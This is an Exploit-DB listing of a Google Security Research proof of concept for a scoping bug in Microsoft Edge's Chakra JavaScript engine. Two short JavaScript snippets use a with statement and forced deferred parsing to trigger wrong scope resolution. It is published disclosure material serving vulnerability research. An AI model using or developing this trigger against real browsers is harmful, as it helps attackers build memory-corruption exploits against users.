Microsoft Edge Chakra – Deferred Parsing Makes Wrong Scopes (2)

  • Author: Google Security Research
    Date: 2018-01-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/43717/
  • /*
    Since the PoC is only triggerable when the "DeferParse" flag is enabled and requires a with statement, I think this is similar to issue 1310.
    
    PoC:
    */
    
    // Enable the flag using '\n'.repeat(0x1000)
    eval(`(function f() {
        with ({}) {
            (function () {
                print(f);
            })();
        }
    }());` + '\n'.repeat(0x1000));
    
    // PoC 2:
    // ./ch poc.js -ForceDeferParse
    (function f() {
        with ({}) {
            (function () {
                print(f);
            })();
        }
    }());